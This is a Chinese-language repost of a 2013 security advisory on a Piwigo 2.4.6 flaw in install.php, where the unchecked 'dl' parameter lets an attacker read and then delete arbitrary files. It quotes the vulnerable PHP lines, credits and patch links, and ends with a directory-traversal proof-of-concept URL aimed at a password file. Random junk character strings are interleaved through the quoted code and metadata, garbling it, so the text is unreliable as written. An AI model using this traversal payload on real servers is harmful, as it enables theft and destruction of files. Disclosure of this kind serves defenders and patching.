Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
/install.php:
, o: M2 r* l& |8 y5 |2 Q* G. ]-------------
3 {0 w' \$ k9 N0 }$ O. v' {4 w: r$ \+ {113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
0 q: d; I* U3 G. _115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
# a& W6 w9 p( t2 O# [116:   header('Cache-Control: no-cache, must-revalidate');
: X1 k" Q# e* b8 X117:   header('Pragma: no-cache');
) _6 w2 `! p/ k  `/ ]118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
1 F' @' t: z0 _1 e# U, L& ^) a8 M120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
" ~! i, f5 X/ I/ ^+ x/ I: V0 H2 R122:   unlink($filename);
% x: t, v0 Z- g: N- ?123:   exit();
: I$ z9 [1 y+ m- I' H124: }
====================================================================
9 D, W# o( k( ~2 D0 k: e
: j2 T* k5 `, w6 n" b9 qTested on: Microsoft Windows 7 Ultimate SP1 (EN)
. o; n! _2 f3 p           Apache 2.4.2 (Win32)
7 [0 V* f3 v7 A6 B2 e           PHP 5.4.4
  @% n+ r$ V9 J2 {           MySQL 5.5.25a
! x2 G) w0 M/ w8 S" [- y
7 x1 B% p$ ^2 e0 Y* h  v$ mVulnerability discovered by Gjoko 'LiquidWorm' Krstic
: }0 \" |- v7 f                            @zeroscience

* ?2 ?. Z4 y" a# h2 _9 ?8 ZAdvisory ID: ZSL-2013-5127
$ f& w: g/ S; @2 QAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
1 S2 [% v0 X* A/ h) iVendor Patch: http://piwigo.org/bugs/view.php?id=2843
& O) z7 Q0 `, p$ i
15.02.2013

1 G2 e7 u& ]+ Q" A% @  L$ ]--
4 J' Q( X2 ]: _! @http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt

! ^; V2 O  c! q